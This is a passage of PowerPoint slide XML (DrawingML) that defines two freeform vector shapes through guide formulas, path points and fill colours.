                  <a:gd name="T18" fmla="*/ 10 w 14"/>
                  <a:gd name="T19" fmla="*/ 6 h 12"/>
                  <a:gd name="T20" fmla="*/ 10 w 14"/>
                  <a:gd name="T21" fmla="*/ 7 h 12"/>
                  <a:gd name="T22" fmla="*/ 11 w 14"/>
                  <a:gd name="T23" fmla="*/ 6 h 12"/>
                  <a:gd name="T24" fmla="*/ 12 w 14"/>
                  <a:gd name="T25" fmla="*/ 6 h 12"/>
                  <a:gd name="T26" fmla="*/ 12 w 14"/>
                  <a:gd name="T27" fmla="*/ 7 h 12"/>
                  <a:gd name="T28" fmla="*/ 13 w 14"/>
                  <a:gd name="T29" fmla="*/ 7 h 12"/>
                  <a:gd name="T30" fmla="*/ 13 w 14"/>
                  <a:gd name="T31" fmla="*/ 7 h 12"/>
                  <a:gd name="T32" fmla="*/ 13 w 14"/>
                  <a:gd name="T33" fmla="*/ 8 h 12"/>
                  <a:gd name="T34" fmla="*/ 13 w 14"/>
                  <a:gd name="T35" fmla="*/ 9 h 12"/>
                  <a:gd name="T36" fmla="*/ 14 w 14"/>
                  <a:gd name="T37" fmla="*/ 10 h 12"/>
                  <a:gd name="T38" fmla="*/ 14 w 14"/>
                  <a:gd name="T39" fmla="*/ 11 h 12"/>
                  <a:gd name="T40" fmla="*/ 14 w 14"/>
                  <a:gd name="T41" fmla="*/ 12 h 12"/>
                  <a:gd name="T42" fmla="*/ 10 w 14"/>
                  <a:gd name="T43" fmla="*/ 8 h 12"/>
                  <a:gd name="T44" fmla="*/ 6 w 14"/>
                  <a:gd name="T45" fmla="*/ 4 h 12"/>
                  <a:gd name="T46" fmla="*/ 0 w 14"/>
                  <a:gd name="T47" fmla="*/ 1 h 12"/>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4"/>
                  <a:gd name="T73" fmla="*/ 0 h 12"/>
                  <a:gd name="T74" fmla="*/ 14 w 14"/>
                  <a:gd name="T75" fmla="*/ 12 h 12"/>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4" h="12">
                    <a:moveTo>
                      <a:pt x="0" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36268" name="Freeform 401"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2989" y="2138"/>
                <a:ext cx="61" cy="59"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 28 w 61"/>
                  <a:gd name="T1" fmla="*/ 52 h 59"/>
                  <a:gd name="T2" fmla="*/ 28 w 61"/>
                  <a:gd name="T3" fmla="*/ 47 h 59"/>
                  <a:gd name="T4" fmla="*/ 24 w 61"/>
                  <a:gd name="T5" fmla="*/ 44 h 59"/>
                  <a:gd name="T6" fmla="*/ 23 w 61"/>
                  <a:gd name="T7" fmla="*/ 40 h 59"/>
                  <a:gd name="T8" fmla="*/ 17 w 61"/>
                  <a:gd name="T9" fmla="*/ 34 h 59"/>
                  <a:gd name="T10" fmla="*/ 15 w 61"/>
                  <a:gd name="T11" fmla="*/ 31 h 59"/>
                  <a:gd name="T12" fmla="*/ 10 w 61"/>
                  <a:gd name="T13" fmla="*/ 27 h 59"/>
                  <a:gd name="T14" fmla="*/ 8 w 61"/>
                  <a:gd name="T15" fmla="*/ 24 h 59"/>
                  <a:gd name="T16" fmla="*/ 7 w 61"/>
                  <a:gd name="T17" fmla="*/ 21 h 59"/>
                  <a:gd name="T18" fmla="*/ 6 w 61"/>
                  <a:gd name="T19" fmla="*/ 18 h 59"/>
                  <a:gd name="T20" fmla="*/ 3 w 61"/>
                  <a:gd name="T21" fmla="*/ 13 h 59"/>
                  <a:gd name="T22" fmla="*/ 1 w 61"/>
                  <a:gd name="T23" fmla="*/ 11 h 59"/>
                  <a:gd name="T24" fmla="*/ 1 w 61"/>
                  <a:gd name="T25" fmla="*/ 9 h 59"/>
                  <a:gd name="T26" fmla="*/ 0 w 61"/>
                  <a:gd name="T27" fmla="*/ 5 h 59"/>
                  <a:gd name="T28" fmla="*/ 2 w 61"/>
                  <a:gd name="T29" fmla="*/ 1 h 59"/>
                  <a:gd name="T30" fmla="*/ 6 w 61"/>
                  <a:gd name="T31" fmla="*/ 4 h 59"/>
                  <a:gd name="T32" fmla="*/ 10 w 61"/>
                  <a:gd name="T33" fmla="*/ 4 h 59"/>
                  <a:gd name="T34" fmla="*/ 14 w 61"/>
                  <a:gd name="T35" fmla="*/ 1 h 59"/>
                  <a:gd name="T36" fmla="*/ 17 w 61"/>
                  <a:gd name="T37" fmla="*/ 2 h 59"/>
                  <a:gd name="T38" fmla="*/ 20 w 61"/>
                  <a:gd name="T39" fmla="*/ 1 h 59"/>
                  <a:gd name="T40" fmla="*/ 23 w 61"/>
                  <a:gd name="T41" fmla="*/ 3 h 59"/>
                  <a:gd name="T42" fmla="*/ 25 w 61"/>
                  <a:gd name="T43" fmla="*/ 3 h 59"/>
                  <a:gd name="T44" fmla="*/ 29 w 61"/>
                  <a:gd name="T45" fmla="*/ 3 h 59"/>
                  <a:gd name="T46" fmla="*/ 33 w 61"/>
                  <a:gd name="T47" fmla="*/ 5 h 59"/>
                  <a:gd name="T48" fmla="*/ 36 w 61"/>
                  <a:gd name="T49" fmla="*/ 3 h 59"/>
                  <a:gd name="T50" fmla="*/ 39 w 61"/>
                  <a:gd name="T51" fmla="*/ 4 h 59"/>
                  <a:gd name="T52" fmla="*/ 42 w 61"/>
                  <a:gd name="T53" fmla="*/ 3 h 59"/>
                  <a:gd name="T54" fmla="*/ 44 w 61"/>
                  <a:gd name="T55" fmla="*/ 5 h 59"/>
                  <a:gd name="T56" fmla="*/ 47 w 61"/>
                  <a:gd name="T57" fmla="*/ 5 h 59"/>
                  <a:gd name="T58" fmla="*/ 48 w 61"/>
                  <a:gd name="T59" fmla="*/ 7 h 59"/>
                  <a:gd name="T60" fmla="*/ 50 w 61"/>
                  <a:gd name="T61" fmla="*/ 9 h 59"/>
                  <a:gd name="T62" fmla="*/ 54 w 61"/>
                  <a:gd name="T63" fmla="*/ 8 h 59"/>
                  <a:gd name="T64" fmla="*/ 57 w 61"/>
                  <a:gd name="T65" fmla="*/ 8 h 59"/>
                  <a:gd name="T66" fmla="*/ 57 w 61"/>
                  <a:gd name="T67" fmla="*/ 12 h 59"/>
                  <a:gd name="T68" fmla="*/ 54 w 61"/>
                  <a:gd name="T69" fmla="*/ 16 h 59"/>
                  <a:gd name="T70" fmla="*/ 54 w 61"/>
                  <a:gd name="T71" fmla="*/ 19 h 59"/>
                  <a:gd name="T72" fmla="*/ 54 w 61"/>
                  <a:gd name="T73" fmla="*/ 22 h 59"/>
                  <a:gd name="T74" fmla="*/ 57 w 61"/>
                  <a:gd name="T75" fmla="*/ 23 h 59"/>
                  <a:gd name="T76" fmla="*/ 59 w 61"/>
                  <a:gd name="T77" fmla="*/ 26 h 59"/>
                  <a:gd name="T78" fmla="*/ 61 w 61"/>
                  <a:gd name="T79" fmla="*/ 27 h 59"/>
                  <a:gd name="T80" fmla="*/ 59 w 61"/>
                  <a:gd name="T81" fmla="*/ 29 h 59"/>
                  <a:gd name="T82" fmla="*/ 56 w 61"/>
                  <a:gd name="T83" fmla="*/ 28 h 59"/>
                  <a:gd name="T84" fmla="*/ 57 w 61"/>
                  <a:gd name="T85" fmla="*/ 31 h 59"/>
                  <a:gd name="T86" fmla="*/ 60 w 61"/>
                  <a:gd name="T87" fmla="*/ 36 h 59"/>
                  <a:gd name="T88" fmla="*/ 58 w 61"/>
                  <a:gd name="T89" fmla="*/ 37 h 59"/>
                  <a:gd name="T90" fmla="*/ 57 w 61"/>
                  <a:gd name="T91" fmla="*/ 37 h 59"/>
                  <a:gd name="T92" fmla="*/ 55 w 61"/>
                  <a:gd name="T93" fmla="*/ 38 h 59"/>
                  <a:gd name="T94" fmla="*/ 52 w 61"/>
                  <a:gd name="T95" fmla="*/ 38 h 59"/>
                  <a:gd name="T96" fmla="*/ 51 w 61"/>
                  <a:gd name="T97" fmla="*/ 40 h 59"/>
                  <a:gd name="T98" fmla="*/ 53 w 61"/>
                  <a:gd name="T99" fmla="*/ 44 h 59"/>
                  <a:gd name="T100" fmla="*/ 51 w 61"/>
                  <a:gd name="T101" fmla="*/ 44 h 59"/>
                  <a:gd name="T102" fmla="*/ 49 w 61"/>
                  <a:gd name="T103" fmla="*/ 43 h 59"/>
                  <a:gd name="T104" fmla="*/ 47 w 61"/>
                  <a:gd name="T105" fmla="*/ 45 h 59"/>
                  <a:gd name="T106" fmla="*/ 46 w 61"/>
                  <a:gd name="T107" fmla="*/ 48 h 59"/>
                  <a:gd name="T108" fmla="*/ 45 w 61"/>
                  <a:gd name="T109" fmla="*/ 49 h 59"/>
                  <a:gd name="T110" fmla="*/ 43 w 61"/>
                  <a:gd name="T111" fmla="*/ 52 h 59"/>
                  <a:gd name="T112" fmla="*/ 43 w 61"/>
                  <a:gd name="T113" fmla="*/ 55 h 59"/>
                  <a:gd name="T114" fmla="*/ 45 w 61"/>
                  <a:gd name="T115" fmla="*/ 57 h 59"/>
                  <a:gd name="T116" fmla="*/ 42 w 61"/>
                  <a:gd name="T117" fmla="*/ 59 h 59"/>
                  <a:gd name="T118" fmla="*/ 40 w 61"/>
                  <a:gd name="T119" fmla="*/ 59 h 59"/>
                  <a:gd name="T120" fmla="*/ 36 w 61"/>
                  <a:gd name="T121" fmla="*/ 55 h 59"/>
                  <a:gd name="T122" fmla="*/ 33 w 61"/>
                  <a:gd name="T123" fmla="*/ 53 h 59"/>
                  <a:gd name="T124" fmla="*/ 31 w 61"/>
                  <a:gd name="T125" fmla="*/ 52 h 59"/>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61"/>
                  <a:gd name="T190" fmla="*/ 0 h 59"/>
                  <a:gd name="T191" fmla="*/ 61 w 61"/>
                  <a:gd name="T192" fmla="*/ 59 h 59"/>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61" h="59">
                    <a:moveTo>
                      <a:pt x="30" y="53"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="29" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="53"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36269" name="Freeform 402"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2989" y="2138"/>
                <a:ext cx="61" cy="59"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 28 w 61"/>
                  <a:gd name="T1" fmla="*/ 52 h 59"/>
                  <a:gd name="T2" fmla="*/ 28 w 61"/>
                  <a:gd name="T3" fmla="*/ 47 h 59"/>
                  <a:gd name="T4" fmla="*/ 24 w 61"/>
                  <a:gd name="T5" fmla="*/ 44 h 59"/>
                  <a:gd name="T6" fmla="*/ 23 w 61"/>
                  <a:gd name="T7" fmla="*/ 40 h 59"/>
                  <a:gd name="T8" fmla="*/ 17 w 61"/>
                  <a:gd name="T9" fmla="*/ 34 h 59"/>
                  <a:gd name="T10" fmla="*/ 15 w 61"/>
                  <a:gd name="T11" fmla="*/ 31 h 59"/>
                  <a:gd name="T12" fmla="*/ 10 w 61"/>
                  <a:gd name="T13" fmla="*/ 27 h 59"/>
                  <a:gd name="T14" fmla="*/ 8 w 61"/>
                  <a:gd name="T15" fmla="*/ 24 h 59"/>
                  <a:gd name="T16" fmla="*/ 7 w 61"/>
                  <a:gd name="T17" fmla="*/ 21 h 59"/>
                  <a:gd name="T18" fmla="*/ 6 w 61"/>
                  <a:gd name="T19" fmla="*/ 18 h 59"/>
                  <a:gd name="T20" fmla="*/ 3 w 61"/>
                  <a:gd name="T21" fmla="*/ 13 h 59"/>
                  <a:gd name="T22" fmla="*/ 1 w 61"/>
                  <a:gd name="T23" fmla="*/ 11 h 59"/>
                  <a:gd name="T24" fmla="*/ 1 w 61"/>
                  <a:gd name="T25" fmla="*/ 9 h 59"/>
                  <a:gd name="T26" fmla="*/ 0 w 61"/>
                  <a:gd name="T27" fmla="*/ 5 h 59"/>
                  <a:gd name="T28" fmla="*/ 2 w 61"/>
                  <a:gd name="T29" fmla="*/ 1 h 59"/>
                  <a:gd name="T30" fmla="*/ 6 w 61"/>
                  <a:gd name="T31" fmla="*/ 4 h 59"/>
                  <a:gd name="T32" fmla="*/ 10 w 61"/>
                  <a:gd name="T33" fmla="*/ 4 h 59"/>
                  <a:gd name="T34" fmla="*/ 14 w 61"/>
                  <a:gd name="T35" fmla="*/ 1 h 59"/>
                  <a:gd name="T36" fmla="*/ 17 w 61"/>
                  <a:gd name="T37" fmla="*/ 2 h 59"/>
                  <a:gd name="T38" fmla="*/ 20 w 61"/>
                  <a:gd name="T39" fmla="*/ 1 h 59"/>
                  <a:gd name="T40" fmla="*/ 23 w 61"/>
                  <a:gd name="T41" fmla="*/ 3 h 59"/>
                  <a:gd name="T42" fmla="*/ 25 w 61"/>
                  <a:gd name="T43" fmla="*/ 3 h 59"/>
                  <a:gd name="T44" fmla="*/ 29 w 61"/>
